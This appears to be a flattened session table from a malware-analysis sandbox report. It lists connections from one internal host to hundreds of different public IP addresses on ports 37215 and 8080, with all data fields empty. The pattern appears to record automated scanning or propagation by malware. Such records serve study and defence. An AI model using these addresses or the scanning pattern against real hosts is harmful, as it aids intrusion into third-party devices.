                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35465192.168.2.233316441.190.64.11137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35466192.168.2.234827841.87.59.22337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35467192.168.2.2359248157.205.248.20137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35468192.168.2.233461064.94.64.137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35469192.168.2.2334554197.211.198.24937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35470192.168.2.2347554157.18.78.23137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35471192.168.2.2332880197.37.216.18737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35472192.168.2.234068641.150.191.9237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35473192.168.2.233996219.100.209.13237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35474192.168.2.234564241.152.198.17737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35475192.168.2.2353038197.129.137.6637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35476192.168.2.2355966157.230.153.16437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35477192.168.2.2356478180.160.128.22037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35478192.168.2.234822041.19.91.16537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35479192.168.2.233819641.3.76.5837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35480192.168.2.236028641.226.110.17037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35481192.168.2.234703841.58.37.4037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35482192.168.2.234529275.52.171.3837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35483192.168.2.234373441.245.43.18037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35484192.168.2.2360432168.23.146.14137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35485192.168.2.235586841.202.191.22737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35486192.168.2.2342066197.0.195.3737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35487192.168.2.233621098.148.122.5937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35488192.168.2.2350104157.59.187.13737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35489192.168.2.233283441.6.53.18737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35490192.168.2.2355298157.163.118.12437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35491192.168.2.2342924197.53.228.19037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35492192.168.2.2341996197.224.243.16837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35493192.168.2.2338716197.227.199.23137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35494192.168.2.2348102197.183.157.23637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35495192.168.2.2359884157.226.158.6837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35496192.168.2.2334266157.87.98.7337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35497192.168.2.2346706123.139.254.11737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35498192.168.2.2341944194.177.175.11137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35499192.168.2.2341896116.163.103.25537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35500192.168.2.2332914157.241.230.13237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35501192.168.2.2339762157.31.60.737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35502192.168.2.2334748197.44.220.6737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35503192.168.2.233758641.145.248.8437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35504192.168.2.2337796157.36.12.20437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35505192.168.2.235837841.147.124.16837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35506192.168.2.2355334130.155.196.16637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35507192.168.2.2339706119.48.43.25337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35508192.168.2.234084841.193.134.9737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35509192.168.2.2336028197.58.179.16637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35510192.168.2.235765446.105.73.4237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35511192.168.2.233743035.51.218.3437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35512192.168.2.234912241.39.239.1737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35513192.168.2.235331241.137.108.9337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35514192.168.2.2356772157.40.31.24037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35515192.168.2.235110224.105.148.15937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35516192.168.2.234890241.7.213.23437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35517192.168.2.2359646197.115.74.20337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35518192.168.2.2356444197.47.225.23337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35519192.168.2.235677241.41.67.7137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35520192.168.2.2333248161.160.21.8637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35521192.168.2.233405897.128.29.15737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35522192.168.2.2351630157.53.135.4537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35523192.168.2.2345286197.170.130.21537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35524192.168.2.235609041.89.247.737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35525192.168.2.234177441.28.176.14237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35526192.168.2.2345970157.65.182.12937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35527192.168.2.2348066157.11.145.12337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35528192.168.2.2351934160.226.112.17437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35529192.168.2.2334728157.31.122.22637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35530192.168.2.2349928112.153.227.5337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35531192.168.2.2336286157.24.78.11237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35532192.168.2.2341008157.22.27.8537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35533192.168.2.2358322197.230.217.15637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35534192.168.2.235758841.252.57.7337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35535192.168.2.2351354157.58.92.18937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35536192.168.2.2333316157.77.48.17137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35537192.168.2.234365241.173.74.18137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35538192.168.2.2343576157.142.243.22137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35539192.168.2.2333064197.45.169.837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35540192.168.2.235267041.34.133.21437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35541192.168.2.2346350197.184.10.13537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35542192.168.2.2336196197.176.62.24337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35543192.168.2.2335992147.33.26.12737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35544192.168.2.234784641.251.224.21137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35545192.168.2.2352440157.99.200.2837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35546192.168.2.233655641.77.125.12437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35547192.168.2.234810841.74.165.6137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35548192.168.2.2338488197.125.44.14037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35549192.168.2.2343798107.200.250.11337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35550192.168.2.2333488197.52.164.11937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35551192.168.2.2340840122.155.60.14937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35552192.168.2.2347880191.150.169.14737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35553192.168.2.2350210157.190.181.1437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35554192.168.2.2351540157.230.121.2037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35555192.168.2.2351664157.216.133.21537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35556192.168.2.2352934161.87.152.437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35557192.168.2.2334610148.101.73.19137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35558192.168.2.2356314157.143.216.6137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35559192.168.2.233755441.37.149.12037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35560192.168.2.2358492197.115.186.7537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35561192.168.2.235409041.191.217.14037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35562192.168.2.234464041.200.18.3237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35563192.168.2.2358088108.170.196.17437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35564192.168.2.235940641.226.84.15437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35565192.168.2.2347826197.127.123.23637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35566192.168.2.2338582157.150.35.1037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35567192.168.2.2351990157.63.49.9437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35568192.168.2.2344794163.48.169.25037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35569192.168.2.2341576157.70.102.14137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35570192.168.2.2342144197.8.80.24037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35571192.168.2.2338916197.193.143.18337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35572192.168.2.2359862197.51.160.3037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35573192.168.2.2360130157.5.115.24037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35574192.168.2.2341272197.152.137.14137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35575192.168.2.2343708197.186.37.21937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35576192.168.2.2346620197.78.38.15637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35577192.168.2.2340526144.86.199.2637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35578192.168.2.2347904157.203.226.15137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35579192.168.2.235501441.66.144.23337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35580192.168.2.2354192207.90.242.22937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35581192.168.2.2341334163.162.14.10537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35582192.168.2.2339906197.205.109.23637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35583192.168.2.2334260129.26.222.437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35584192.168.2.2356940176.164.145.24437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35585192.168.2.2338436146.43.104.21037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35586192.168.2.233899441.229.37.8337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35587192.168.2.2340190157.40.254.15537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35588192.168.2.234588641.57.196.18437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35589192.168.2.2357246197.41.39.23337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35590192.168.2.2336650157.217.180.7137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35591192.168.2.234469441.255.187.637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35592192.168.2.2356932157.180.193.9537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35593192.168.2.234553641.196.180.25537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35594192.168.2.235474441.192.217.20237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35595192.168.2.2342306213.198.75.3437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35596192.168.2.2357166157.84.23.3537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35597192.168.2.2351098206.159.174.137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35598192.168.2.235809841.50.50.9937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35599192.168.2.2336466157.174.195.24037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35600192.168.2.2357200157.68.60.16637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35601192.168.2.23479868.123.49.437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35602192.168.2.235366641.43.0.7637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35603192.168.2.2349360197.237.92.11937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35604192.168.2.233737241.57.16.11337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35605192.168.2.2347846197.175.137.2637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35606192.168.2.235137474.40.149.16937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35607192.168.2.2353212197.207.190.21337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35608192.168.2.235725841.221.29.13837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35609192.168.2.2336276157.59.146.737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35610192.168.2.2334866157.53.121.10537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35611192.168.2.2353974157.74.46.18737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35612192.168.2.2333926197.14.63.1037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35613192.168.2.2343658136.5.216.17937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35614192.168.2.234109857.246.132.1228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35615192.168.2.235161280.249.210.58080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35616192.168.2.2346788185.253.179.1258080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35617192.168.2.2337930204.177.123.1518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35618192.168.2.2359626129.177.123.1278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35619192.168.2.2351168117.154.168.1798080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35620192.168.2.2356954196.90.139.1578080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35621192.168.2.2358606105.7.24.08080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35622192.168.2.2354428177.35.134.868080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35623192.168.2.233865827.122.79.608080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35624192.168.2.2334080128.136.195.1738080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35625192.168.2.2349920164.183.252.1878080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35626192.168.2.2359452110.74.115.1228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35627192.168.2.2356654106.65.212.1458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35628192.168.2.2355730104.25.156.678080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35629192.168.2.2355318157.101.120.2418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35630192.168.2.235471882.95.207.1588080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35631192.168.2.2356962201.160.210.958080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35632192.168.2.2351510125.151.203.2368080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35633192.168.2.2336554175.246.250.2308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35634192.168.2.23460581.219.158.1278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35635192.168.2.2337164161.175.48.458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35636192.168.2.233510871.55.77.588080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35637192.168.2.234321452.8.24.1198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35638192.168.2.2346966139.83.11.818080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35639192.168.2.2338380168.207.50.2128080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35640192.168.2.234272661.56.126.1508080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35641192.168.2.2351788144.22.151.528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35642192.168.2.2358992135.132.194.1498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35643192.168.2.2341926192.75.83.1968080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35644192.168.2.2349328209.181.139.1918080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35645192.168.2.2337812119.130.132.1948080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35646192.168.2.2345312119.106.133.738080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35647192.168.2.234149243.118.26.1018080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35648192.168.2.2340724166.20.118.938080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35649192.168.2.235200486.206.168.48080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35650192.168.2.234814252.31.175.1478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35651192.168.2.2354160180.27.59.2368080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35652192.168.2.233778677.168.147.1808080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35653192.168.2.2360744171.151.159.1948080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35654192.168.2.2348396128.230.113.1768080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35655192.168.2.233825465.127.230.308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35656192.168.2.2341318221.117.179.1608080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35657192.168.2.2346444156.216.123.788080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35658192.168.2.2358414192.187.54.358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35659192.168.2.2344552223.116.84.1138080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35660192.168.2.235450073.151.171.1928080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35661192.168.2.2333230110.198.45.578080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35662192.168.2.2354254191.166.252.1968080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35663192.168.2.2339560187.163.241.208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35664192.168.2.2351964220.175.20.1398080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35665192.168.2.2355808147.167.134.1978080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35666192.168.2.2341428117.110.101.2038080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35667192.168.2.235175646.184.82.2558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35668192.168.2.2339130198.1.164.428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35669192.168.2.2356488166.196.9.1688080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35670192.168.2.234123835.49.18.1068080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35671192.168.2.235059025.192.71.1968080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35672192.168.2.23337765.136.23.2288080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35673192.168.2.235904098.117.11.1428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35674192.168.2.235411065.56.152.398080
